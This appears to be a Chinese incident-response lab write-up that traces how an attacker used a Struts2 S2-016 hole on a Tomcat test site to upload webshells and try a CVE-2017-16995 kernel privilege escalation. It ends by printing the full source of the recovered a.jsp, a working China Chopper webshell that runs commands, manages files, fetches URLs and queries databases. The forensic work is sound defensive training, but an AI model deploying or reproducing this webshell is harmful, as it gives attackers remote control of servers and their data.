场景说明:
某天运维人员发现在/opt/tomcat8/webapps/test/目录下,多出了一个index_bak.jsp这个文件,
并告诉你如下信息
操作系统:ubuntu-16.04
业务:测试站点
中间件:tomcat
开放端口:22,8080,8009
tomcat目录:/opt/tomcat8/
站点根目录:/opt/tomcat8/webapps排查过程
1.确认文件被创建的时间
找到网站根目录下的index_bak.jps文件, 查看index_bak.jps的时间点
查看文件内容,可以看到有密码,还有一些数据库操作模块的导入,其中的 REQUEST_CHARSET 和PAGE_CHARSET应该是为了躲避防火墙入侵检测用的,这是一个木马
2.web扫描确认
1.我们把tomcat的源码目录打包为归档文件,然后使用杀毒工具来检测
使用ssh的sftp来拷贝下来,使用d盾来查杀,在这里我们扫到了两个后门,我们再看一下a.jsp这个后门的创建时间
发现a.jsp也是一个典型的木马
来看一下a.jsp的创建时间
我们得到了两个文件的创建时间
a.jsp:2018-10-20 17:14:00
index_bak.jsp:2018-10-22 16:57:13我们来访问以下a.jsp这个网站文件,看看是可以访问,是否有权限访问,是报错,那么我们使用中国蚁剑来连接试试
我们使用菜刀吧,使用蚁剑不行,不支持.jsp格式的木马
使用菜刀成功连接
访问另一个木马文件,我们访问之后输入的密码,就是备份文件中的密码
得到了以下界面,说明大马被正常执行了
3.web日志分析
日志目录是/opt/tomcat8/logs/
使用vscode打开文件夹,然后查找文本
发现192.168.199.205在2018-10-20-17:14:06首次访问a.jsp登录服务器
同样,我们再搜索index_bak.jsp,发现172.20.10.13在2018-10-22-16:57:55首次访问了
对于a.jsp172.20.10.13和192.168.199.105都访问过a.jsp,然后index_bak.jsp只有172.20.10.13访问过,得到攻击者的ip地址如下
192.168.199.105
172.20.10.13
排查在访问a.jsp之上的,攻击者ip地址访问网站的记录,找到可疑的路径,带有攻击参数的路径
1.结合a.jsp的创建时间为2018-10-20-17-14-00来搜索日志,发现有一条路径是和a.jsp时间吻合的
这条记录是可疑的
2./test/fileupload/doUpload.action继续查看其他可疑日志,发现尝试了使用登录接口,但在页面中测试,接口无法上传文件,所以排除
3./manager/html曾多次访问tomcat管理界面,manager是tomcat的管理目录,多次访问都是401,所以没有通过口令进入到管理页面
通过排查,我们发现网站使用的status框架,使用工具检测是否存在status漏洞
我们可以看后缀是否存在后缀为.action来判断是否是status2框架的网站
然后通过工具检测结果发现存在很多漏洞
我们使用命令执行看看
到此我们基本可以确实攻击者使用了s2-016漏洞进行攻击,然后通过文件上传来上传文件a.jsp连接菜刀了,由于web日志中没有记录POST请求的数据,我们就不知道攻击者执行了哪些命令,做了什么事情了
4.系统排查
排查系统是否有异常
我们在struts中测试whoami会显示dbapp用户,所以可能是通过dbapp用户来提权的,我们先从dbapp家目录开始排查
在它的家目录中,发现了两个可以的文件,a*和a.c*比较可疑
查看时间
我们得知了
2018-10-22-16:48:39上传了a
2018-10-22-16:48:23上传了a.c查看a.c的内容,发现是内核提权的脚本
到文件威胁平台中分析a发现为CVE-2017-16995可执行文件
黑客入侵过程
根据目前的信息,可以得到如下的结论
1.在2018-10-20 17:14:00利用s2-016,通过/test/showcase.action页面,上传了webshell,a.jsp,然后获得了tomcat的dbapp权限
2.2018-10-22-16:48:23在/home/dbapp/上传了a.c文件,经过编译,变成了a文件
3.2018-10-22-16:48:39在/home/dbapp/上传或者生成了a,并且尝试提权,但是提权失败了
4.2018-10-20-16:57:13通过a.jsp上传了大马index_bak.jsp
攻击者的ip地址为:
192.168.199.105
172.20.10.13
a.jsp的内容
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!
String Pwd="chopper";
String EC(String s,String c)throws Exception{return new String(s.getBytes("ISO-8859-1"),c);}
Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
%><%
String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
StringBuffer sb=new StringBuffer("");try{sb.append("X@Y");
if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("X@Y");out.print(sb.toString());
%>
